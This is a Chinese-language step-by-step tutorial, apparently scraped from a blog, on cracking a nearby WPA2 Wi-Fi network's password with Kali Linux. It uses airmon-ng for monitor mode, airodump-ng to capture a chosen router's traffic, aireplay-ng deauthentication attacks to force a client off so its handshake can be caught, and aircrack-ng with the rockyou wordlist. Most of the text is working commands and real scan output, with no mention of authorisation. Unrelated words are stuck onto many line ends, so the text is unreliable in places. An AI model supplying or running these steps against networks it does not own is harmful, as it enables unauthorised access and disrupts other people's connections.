硬件使用支持Monitor的USB無線網卡。Kali能夠使用虛擬機,官網有直接能夠下載打開的虛擬機鏡像,即開即用。less
正常狀況下使用ifconfig 就能夠看到識別到的網卡wlan0了。spa
使用iwconfig命令能夠查看當前的網卡信息。.net
進入monitor模式:airmon-ng start wlan0xml
運行iwconfig能夠看到網卡進入了monitor模式:ip
root@kali:~# iwconfig路由
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.442 GHz Tx-Power=20 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Power Management:off eth0 no wireless extensions. lo no wireless extensions.
使用airodump-ng wlan0mon命令查看當前網卡所檢測到的無線信息。運行這個命令後選擇一個路由進行破解,記住其的BSSID與CH信息。虛擬機
CH 9 ][ Elapsed: 1 min ][ 2017-12-08 01:32 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 44:D1:FA:08:B9:60 -10 27 3 0 13 54e WPA2 CCMP PSK Wireless 2.4G_08B960 80:89:17:7F:90:E2 -15 24 12 0 1 54e. WPA2 CCMP PSK yyyy 00:0C:43:10:4E:15 -18 30 0 0 9 54e. WPA2 CCMP PSK w-AP EC:3D:FD:C9:86:6A -20 27 8 0 3 54e WPA2 CCMP PSK <length: 0> B8:3A:08:62:10:F9 -23 20 0 0 6 54e WPA2 CCMP PSK NOVA_10E8 B0:D5:9D:20:BB:05 -26 10 0 0 1 54e. WPA2 CCMP PSK ss B8:3A:08:62:10:E9 -28 20 0 0 6 54e WPA2 CCMP PSK NOVA_10E8 94:8B:03:FE:01:C0 -28 20 0 0 7 54e OPN CYWiFi-01C0 96:8B:03:FA:01:C0 -28 27 0 0 7 54e OPN �..費��.�.��.�享WiFi 78:A3:51:32:3B:BC -29 25 0 0 13 54e OPN 2.4000000000000000000 00:AA:BB:59:00:13 -29 22 0 0 7 54e. OPN 000-p59-0013 78:D3:8D:F7:E8:95 -29 24 0 0 6 54e. WPA2 CCMP PSK Tozed-test1 D8:D8:66:03:E4:6E -32 10 0 0 11 54e. OPN Tozed-2.4G D8:D8:66:03:E4:7A -33 6 0 0 11 54e. OPN Tozed-2.4G 00:03:7F:33:27:4F -34 60 0 0 8 54e. WPA2 CCMP PSK tozed-33274F 00:E0:4C:14:0F:DE -36 14 0 0 6 54e WPA2 CCMP PSK FWT_140FDE 34:96:72:43:8E:CE -37 22 0 0 11 54e. WPA2 CCMP PSK TP-LINK_8ECE
其中亂碼的是中文SSID。it
使用命令對指定的SSID進行抓包:io
airodump-ng wlan0mon --bssid 00:0C:43:10:4E:15 -c 9 -w ap4e15test
其中--bssid 爲指定bssid,-c 指定信道。-w 指定抓取後生成的文件,這個文件會以ap4e15開頭。
CH 9 ][ Elapsed: 36 s ][ 2017-12-08 01:41 ][ WPA handshake: 00:0C:43:10:4E:15 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:0C:43:10:4E:15 -15 0 367 560 4 9 54e. WPA2 CCMP PSK w-AP BSSID STATION PWR Rate Lost Frames Probe 00:0C:43:10:4E:15 F8:23:B2:A2:B1:0C -25 0e-24e 975 691
能夠看到有一臺 F8:23:B2:A2:B1:0C 。設備鏈接到了該ap
保持以上的命令運行,新開一個終端運行命令使其從新創建鏈接,這樣咱們就能抓取到四步握手的信息了。
root@kali:~# aireplay-ng -0 2 -a 00:0C:43:10:4E:15 -c F8:23:B2:A2:B1:0C wlan0mon
01:46:41 Waiting for beacon frame (BSSID: 00:0C:43:10:4E:15) on channel 9 01:46:42 Sending 64 directed DeAuth. STMAC: [F8:23:B2:A2:B1:0C] [61|62 ACKs] 01:46:42 Sending 64 directed DeAuth. STMAC: [F8:23:B2:A2:B1:0C] [59|60 ACKs]
這個時候該設備應該會從新鏈接了。能夠取消抓包。
root@kali:~# ls ap4e15*
ap4e15-01.cap ap4e15-01.kismet.csv ap4e15-02.cap ap4e15-02.kismet.csv ap4e15-01.csv ap4e15-01.kismet.netxml ap4e15-02.csv ap4e15-02.kismet.netxml
以上的名字,是抓包時候-w參數後設置的。這幾種不一樣的格式,若是須要分析則能夠使用.cap的文件,用wireshark能夠打開分析。
而後使用Kali的默認字典進行破解,目錄在/usr/share/wordlists/rockyou.txt.gz,進入該目錄,使用gunzip rockyou.txt.gz解壓。其它字典位置能夠本身去研究。
aircrack-ng -w /usr/share/wordlists/rockyou.txt ap4e15-01.cap
可能破解會成功 也會失敗,簡單的就很容易了 複雜的 ,字典包裏面沒有那就不行了。